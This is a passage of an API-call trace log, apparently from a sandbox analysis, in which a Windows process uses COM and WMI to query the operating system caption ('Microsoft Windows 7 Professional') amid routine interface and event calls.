WbemLocator:IUnknown:QueryInterface (in: This=0x77162c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e6b4 | out: ppvObject=0x41e6b4*=0x77162c) returned 0x0 [0108.773] WbemLocator:IUnknown:Release (This=0x77162c) returned 0x3 [0108.773] WbemLocator:IUnknown:Release (This=0x77162c) returned 0x2 [0108.773] CoGetContextToken (in: pToken=0x41e900 | out: pToken=0x41e900) returned 0x0 [0108.773] WbemLocator:IUnknown:AddRef (This=0x672f58c) returned 0x3 [0108.773] IWbemServices:ExecQuery (in: This=0x672f58c, strQueryLanguage="WQL", strQuery="SELECT Caption FROM Win32_OperatingSystem", lFlags=16, pCtx=0x0, ppEnum=0x41eb24 | out: ppEnum=0x41eb24*=0x672cc94) returned 0x0 [0108.779] GetCurrentThreadId () returned 0xba4 [0108.779] ResetEvent (hEvent=0xb8) returned 1 [0108.779] GetCurrentThreadId () returned 0xba4 [0108.779] GetCurrentThreadId () returned 0xba4 [0108.779] GetCurrentThreadId () returned 0xba4 [0108.779] GetCurrentThreadId () returned 0xba4 [0108.779] ResetEvent (hEvent=0xb8) returned 1 [0108.779] GetCurrentThreadId () returned 0xba4 [0108.779] GetCurrentThreadId () returned 0xba4 [0108.779] SetEvent (hEvent=0xbc) returned 1 [0108.779] SetEvent (hEvent=0xb8) returned 1 [0108.779] CloseHandle (hObject=0x44c) returned 1 [0108.781] GetCurrentThreadId () returned 0xba4 [0108.781] ResetEvent (hEvent=0xb8) returned 1 [0108.781] GetCurrentThreadId () returned 0xba4 [0108.781] GetCurrentThreadId () returned 0xba4 [0108.782] GetCurrentThreadId () returned 0xba4 [0108.782] GetCurrentThreadId () returned 0xba4 [0108.782] ResetEvent (hEvent=0xb8) returned 1 [0108.782] GetCurrentThreadId () returned 0xba4 [0108.782] GetCurrentThreadId () returned 0xba4 [0108.782] SetEvent (hEvent=0xbc) returned 1 [0108.782] SetEvent (hEvent=0xb8) returned 1 [0108.782] CloseHandle (hObject=0x44c) returned 1 [0108.783] IUnknown:QueryInterface (in: This=0x672cc94, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e970 | out: ppvObject=0x41e970*=0x672cc98) returned 0x0 [0108.783] IClientSecurity:QueryBlanket (in: This=0x672cc98, pProxy=0x672cc94, pAuthnSvc=0x41e9c0, pAuthzSvc=0x41e9bc, pServerPrincName=0x41e9b4, pAuthnLevel=0x41e9b8, pImpLevel=0x41e9a8, pAuthInfo=0x41e9ac, pCapabilites=0x41e9b0 | out: pAuthnSvc=0x41e9c0*=0xa, pAuthzSvc=0x41e9bc*=0x0, pServerPrincName=0x41e9b4, pAuthnLevel=0x41e9b8*=0x6, pImpLevel=0x41e9a8*=0x2, pAuthInfo=0x41e9ac, pCapabilites=0x41e9b0*=0x1) returned 0x0 [0108.783] IUnknown:Release (This=0x672cc98) returned 0x1 [0108.783] IUnknown:QueryInterface (in: This=0x672cc94, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e964 | out: ppvObject=0x41e964*=0x77171c) returned 0x0 [0108.783] IUnknown:QueryInterface (in: This=0x672cc94, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e960 | out: ppvObject=0x41e960*=0x672cc98) returned 0x0 [0108.783] IClientSecurity:SetBlanket (This=0x672cc98, pProxy=0x672cc94, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0108.784] GetCurrentThreadId () returned 0xba4 [0108.784] ResetEvent (hEvent=0xb8) returned 1 [0108.784] GetCurrentThreadId () returned 0xba4 [0108.784] GetCurrentThreadId () returned 0xba4 [0108.784] GetCurrentThreadId () returned 0xba4 [0108.784] GetCurrentThreadId () returned 0xba4 [0108.784] ResetEvent (hEvent=0xb8) returned 1 [0108.784] GetCurrentThreadId () returned 0xba4 [0108.784] GetCurrentThreadId () returned 0xba4 [0108.784] SetEvent (hEvent=0xbc) returned 1 [0108.784] SetEvent (hEvent=0xb8) returned 1 [0108.784] CloseHandle (hObject=0x44c) returned 1 [0108.786] GetCurrentThreadId () returned 0xba4 [0108.786] ResetEvent (hEvent=0xb8) returned 1 [0108.786] GetCurrentThreadId () returned 0xba4 [0108.786] GetCurrentThreadId () returned 0xba4 [0108.786] GetCurrentThreadId () returned 0xba4 [0108.786] GetCurrentThreadId () returned 0xba4 [0108.786] ResetEvent (hEvent=0xb8) returned 1 [0108.786] GetCurrentThreadId () returned 0xba4 [0108.786] GetCurrentThreadId () returned 0xba4 [0108.786] SetEvent (hEvent=0xbc) returned 1 [0108.786] SetEvent (hEvent=0xb8) returned 1 [0108.787] CloseHandle (hObject=0x44c) returned 1 [0108.787] IUnknown:Release (This=0x672cc98) returned 0x2 [0108.787] WbemLocator:IUnknown:Release (This=0x77171c) returned 0x1 [0108.788] CoTaskMemFree (pv=0x758b38) [0108.788] IUnknown:QueryInterface (in: This=0x672cc94, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e55c | out: ppvObject=0x41e55c*=0x77171c) returned 0x0 [0108.788] WbemLocator:IUnknown:QueryInterface (in: This=0x77171c, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e518 | out: ppvObject=0x41e518*=0x0) returned 0x80004002 [0108.788] WbemLocator:IUnknown:QueryInterface (in: This=0x77171c, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e334 | out: ppvObject=0x41e334*=0x0) returned 0x80004002 [0108.789] WbemLocator:IUnknown:AddRef (This=0x77171c) returned 0x3 [0108.789] WbemLocator:IUnknown:QueryInterface (in: This=0x77171c, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41de74 | out: ppvObject=0x41de74*=0x0) returned 0x80004002 [0108.789] WbemLocator:IUnknown:QueryInterface (in: This=0x77171c, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41de24 | out: ppvObject=0x41de24*=0x0) returned 0x80004002 [0108.789] WbemLocator:IUnknown:QueryInterface (in: This=0x77171c, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41de30 | out: ppvObject=0x41de30*=0x77167c) returned 0x0 [0108.789] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x77167c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41de38 | out: pCid=0x41de38*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0108.789] WbemLocator:IUnknown:Release (This=0x77167c) returned 0x3 [0108.789] CoGetContextToken (in: pToken=0x41de90 | out: pToken=0x41de90) returned 0x0 [0108.789] CoGetContextToken (in: pToken=0x41e298 | out: pToken=0x41e298) returned 0x0 [0108.789] WbemLocator:IUnknown:QueryInterface (in: This=0x77171c, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e328 | out: ppvObject=0x41e328*=0x771704) returned 0x0 [0108.790] WbemLocator:IRpcOptions:Query (in: This=0x771704, pPrx=0x77171c, dwProperty=2, pdwValue=0x41e350 | out: pdwValue=0x41e350) returned 0x80004002 [0108.790] WbemLocator:IUnknown:Release (This=0x771704) returned 0x3 [0108.790] WbemLocator:IUnknown:Release (This=0x77171c) returned 0x2 [0108.790] CoGetContextToken (in: pToken=0x41e870 | out: pToken=0x41e870) returned 0x0 [0108.790] CoGetContextToken (in: pToken=0x41e7d0 | out: pToken=0x41e7d0) returned 0x0 [0108.790] WbemLocator:IUnknown:QueryInterface (in: This=0x77171c, riid=0x41e8a0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x41e89c | out: ppvObject=0x41e89c*=0x672cc94) returned 0x0 [0108.790] IUnknown:AddRef (This=0x672cc94) returned 0x4 [0108.790] IUnknown:Release (This=0x672cc94) returned 0x3 [0108.790] IUnknown:Release (This=0x672cc94) returned 0x2 [0108.790] WbemLocator:IUnknown:Release (This=0x672f58c) returned 0x2 [0108.790] SysStringLen (param_1=0x0) returned 0x0 [0108.790] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x41eb70 | out: puCount=0x41eb70*=0x2) returned 0x0 [0108.790] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x41eb6c*=0x0, pszText=0x0 | out: puBuffLength=0x41eb6c*=0xf, pszText=0x0) returned 0x0 [0108.790] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x41eb6c*=0xf, pszText="00000000000000" | out: puBuffLength=0x41eb6c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0108.790] CoGetContextToken (in: pToken=0x41e9c0 | out: pToken=0x41e9c0) returned 0x0 [0108.790] IUnknown:AddRef (This=0x672cc94) returned 0x3 [0108.790] IEnumWbemClassObject:Clone (in: This=0x672cc94, ppEnum=0x41eb7c | out: ppEnum=0x41eb7c*=0x672f62c) returned 0x0 [0108.791] IUnknown:QueryInterface (in: This=0x672f62c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41ea40 | out: ppvObject=0x41ea40*=0x672f630) returned 0x0 [0108.792] IClientSecurity:QueryBlanket (in: This=0x672f630, pProxy=0x672f62c, pAuthnSvc=0x41ea90, pAuthzSvc=0x41ea8c, pServerPrincName=0x41ea84, pAuthnLevel=0x41ea88, pImpLevel=0x41ea78, pAuthInfo=0x41ea7c, pCapabilites=0x41ea80 | out: pAuthnSvc=0x41ea90*=0xa, pAuthzSvc=0x41ea8c*=0x0, pServerPrincName=0x41ea84, pAuthnLevel=0x41ea88*=0x6, pImpLevel=0x41ea78*=0x2, pAuthInfo=0x41ea7c, pCapabilites=0x41ea80*=0x1) returned 0x0 [0108.792] IUnknown:Release (This=0x672f630) returned 0x1 [0108.792] IUnknown:QueryInterface (in: This=0x672f62c, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41ea34 | out: ppvObject=0x41ea34*=0x77217c) returned 0x0 [0108.792] IUnknown:QueryInterface (in: This=0x672f62c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41ea30 | out: ppvObject=0x41ea30*=0x672f630) returned 0x0 [0108.792] IClientSecurity:SetBlanket (This=0x672f630, pProxy=0x672f62c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0108.794] IUnknown:Release (This=0x672f630) returned 0x2 [0108.794] WbemLocator:IUnknown:Release (This=0x77217c) returned 0x1 [0108.794] CoTaskMemFree (pv=0x758aa8) [0108.795] IUnknown:QueryInterface (in: This=0x672f62c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e61c | out: ppvObject=0x41e61c*=0x77217c) returned 0x0 [0108.795] WbemLocator:IUnknown:QueryInterface (in: This=0x77217c, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e5d8 | out: ppvObject=0x41e5d8*=0x0) returned 0x80004002 [0108.795] WbemLocator:IUnknown:QueryInterface (in: This=0x77217c, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e3f4 | out: ppvObject=0x41e3f4*=0x0) returned 0x80004002 [0108.795] WbemLocator:IUnknown:AddRef (This=0x77217c) returned 0x3 [0108.795] WbemLocator:IUnknown:QueryInterface (in: This=0x77217c, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41df34 | out: ppvObject=0x41df34*=0x0) returned 0x80004002 [0108.796] WbemLocator:IUnknown:QueryInterface (in: This=0x77217c, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dee4 | out: ppvObject=0x41dee4*=0x0) returned 0x80004002 [0108.796] WbemLocator:IUnknown:QueryInterface (in: This=0x77217c, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41def0 | out: ppvObject=0x41def0*=0x7720dc) returned 0x0 [0108.796] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7720dc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41def8 | out: pCid=0x41def8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0108.796] WbemLocator:IUnknown:Release (This=0x7720dc) returned 0x3 [0108.796] CoGetContextToken (in: pToken=0x41df50 | out: pToken=0x41df50) returned 0x0 [0108.796] CoGetContextToken (in: pToken=0x41e358 | out: pToken=0x41e358) returned 0x0 [0108.796] WbemLocator:IUnknown:QueryInterface (in: This=0x77217c, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e3e8 | out: ppvObject=0x41e3e8*=0x772164) returned 0x0 [0108.796] WbemLocator:IRpcOptions:Query (in: This=0x772164, pPrx=0x77217c, dwProperty=2, pdwValue=0x41e410 | out: pdwValue=0x41e410) returned 0x80004002 [0108.796] WbemLocator:IUnknown:Release (This=0x772164) returned 0x3 [0108.797] WbemLocator:IUnknown:Release (This=0x77217c) returned 0x2 [0108.797] CoGetContextToken (in: pToken=0x41e930 | out: pToken=0x41e930) returned 0x0 [0108.797] CoGetContextToken (in: pToken=0x41e890 | out: pToken=0x41e890) returned 0x0 [0108.797] WbemLocator:IUnknown:QueryInterface (in: This=0x77217c, riid=0x41e960*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x41e95c | out: ppvObject=0x41e95c*=0x672f62c) returned 0x0 [0108.797] IUnknown:AddRef (This=0x672f62c) returned 0x4 [0108.797] IUnknown:Release (This=0x672f62c) returned 0x3 [0108.797] IUnknown:Release (This=0x672f62c) returned 0x2 [0108.797] IUnknown:Release (This=0x672cc94) returned 0x2 [0108.797] SysStringLen (param_1=0x0) returned 0x0 [0108.797] IEnumWbemClassObject:Reset (This=0x672f62c) returned 0x0 [0108.799] CoTaskMemAlloc (cb=0x4) returned 0x765158 [0108.799] IEnumWbemClassObject:Next (in: This=0x672f62c, lTimeout=-1, uCount=0x1, apObjects=0x765158, puReturned=0x3480818 | out: apObjects=0x765158*=0x672f668, puReturned=0x3480818*=0x1) returned 0x0 [0108.800] IUnknown:QueryInterface (in: This=0x672f668, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e1e0 | out: ppvObject=0x41e1e0*=0x672f668) returned 0x0 [0108.800] IUnknown:QueryInterface (in: This=0x672f668, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e19c | out: ppvObject=0x41e19c*=0x0) returned 0x80004002 [0108.826] IUnknown:QueryInterface (in: This=0x672f668, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41dfbc | out: ppvObject=0x41dfbc*=0x0) returned 0x80004002 [0108.826] IUnknown:AddRef (This=0x672f668) returned 0x3 [0108.826] IUnknown:QueryInterface (in: This=0x672f668, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dafc | out: ppvObject=0x41dafc*=0x0) returned 0x80004002 [0108.826] IUnknown:QueryInterface (in: This=0x672f668, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41daac | out: ppvObject=0x41daac*=0x0) returned 0x80004002 [0108.826] IUnknown:QueryInterface (in: This=0x672f668, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dab8 | out: ppvObject=0x41dab8*=0x672f66c) returned 0x0 [0108.827] IMarshal:GetUnmarshalClass (in: This=0x672f66c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dac0 | out: pCid=0x41dac0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0108.827] IUnknown:Release (This=0x672f66c) returned 0x3 [0108.827] CoGetContextToken (in: pToken=0x41db18 | out: pToken=0x41db18) returned 0x0 [0108.827] CoGetContextToken (in: pToken=0x41df20 | out: pToken=0x41df20) returned 0x0 [0108.827] IUnknown:QueryInterface (in: This=0x672f668, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dfb0 | out: ppvObject=0x41dfb0*=0x0) returned 0x80004002 [0108.827] IUnknown:Release (This=0x672f668) returned 0x2 [0108.827] CoGetContextToken (in: pToken=0x41e4f0 | out: pToken=0x41e4f0) returned 0x0 [0108.827] CoGetContextToken (in: pToken=0x41e450 | out: pToken=0x41e450) returned 0x0 [0108.827] IUnknown:QueryInterface (in: This=0x672f668, riid=0x41e520*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e51c | out: ppvObject=0x41e51c*=0x672f668) returned 0x0 [0108.827] IUnknown:AddRef (This=0x672f668) returned 0x4 [0108.827] IUnknown:Release (This=0x672f668) returned 0x3 [0108.827] IUnknown:Release (This=0x672f668) returned 0x2 [0108.827] CoTaskMemFree (pv=0x765158) [0108.828] CoGetContextToken (in: pToken=0x41e858 | out: pToken=0x41e858) returned 0x0 [0108.828] IUnknown:AddRef (This=0x672f668) returned 0x3 [0108.828] IWbemClassObject:Get (in: This=0x672f668, wszName="__GENUS", lFlags=0, pVal=0x41eb6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ebec*=0, plFlavor=0x41ebe8*=0 | out: pVal=0x41eb6c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ebec*=3, plFlavor=0x41ebe8*=64) returned 0x0 [0108.828] IWbemClassObject:Get (in: This=0x672f668, wszName="__PATH", lFlags=0, pVal=0x41eb50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ebd4*=0, plFlavor=0x41ebd0*=0 | out: pVal=0x41eb50*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ebd4*=8, plFlavor=0x41ebd0*=64) returned 0x0 [0108.835] IWbemClassObject:Get (in: This=0x672f668, wszName="__RELPATH", lFlags=0, pVal=0x41eb50*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ebd4*=8, plFlavor=0x41ebd0*=64 | out: pVal=0x41eb50*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ebd4*=8, plFlavor=0x41ebd0*=64) returned 0x0 [0108.835] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x41eba8 | out: puCount=0x41eba8*=0x2) returned 0x0 [0108.835] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x41eba4*=0x0, pszText=0x0 | out: puBuffLength=0x41eba4*=0xf, pszText=0x0) returned 0x0 [0108.836] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x41eba4*=0xf, pszText="00000000000000" | out: puBuffLength=0x41eba4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0108.836] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x41eb74 | out: puCount=0x41eb74*=0x2) returned 0x0 [0108.836] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x41eb70*=0x0, pszText=0x0 | out: puBuffLength=0x41eb70*=0xf, pszText=0x0) returned 0x0 [0108.836] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x41eb70*=0xf, pszText="00000000000000" | out: puBuffLength=0x41eb70*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0108.836] IWbemClassObject:Get (in: This=0x672f668, wszName="Caption", lFlags=0, pVal=0x41eb70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3480c68*=0, plFlavor=0x3480c6c*=0 | out: pVal=0x41eb70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 7 Professional ", varVal2=0x0), pType=0x3480c68*=8, plFlavor=0x3480c6c*=32) returned 0x0 [0108.836] SysStringByteLen (bstr="Microsoft Windows 7 Professional ") returned 0x42 [0108.836] SysStringByteLen (bstr="Microsoft Windows 7 Professional ") returned 0x42 [0108.836] IWbemClassObject:Get (in: This=0x672f668, wszName="Caption", lFlags=0, pVal=0x41eb78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3480c68*=8, plFlavor=0x3480c6c*=32 | out: pVal=0x41eb78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 7 Professional ", varVal2=0x0), pType=0x3480c68*=8, plFlavor=0x3480c6c*=32) returned 0x0 [0108.836] SysStringByteLen (bstr="Microsoft Windows 7 Professional ") returned 0x42 [0108.836] SysStringByteLen (bstr="Microsoft Windows 7 Professional ") returned 0x42 [0108.837] CoGetContextToken (in: pToken=0x41eaa8 | out: pToken=0x41eaa8) returned 0x0 [0108.837] WbemLocator:IUnknown:Release (This=0x77217c) returned 0x1 [0108.837] IUnknown:Release (This=0x672f62c) returned 0x0 [0108.849] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41eb9c | out: ppv=0x41eb9c*=0x72015c) returned 0x0 [0108.849] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41eb94 | out: pAptType=0x41eb94*=1) returned 0x0 [0108.849] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41eb98 | out: ppvObject=0x41eb98*=0x0) returned 0x80004002 [0108.849] IUnknown:Release (This=0x72015c) returned 0x1 [0108.850] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e508 | out: ppv=0x41e508*=0x6720a90) returned 0x0 [0108.850] WbemDefPath:IUnknown:QueryInterface (in: This=0x6720a90, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e720 | out: ppvObject=0x41e720*=0x0) returned 0x80004002 [0108.850] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6720a90, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e734 | out: 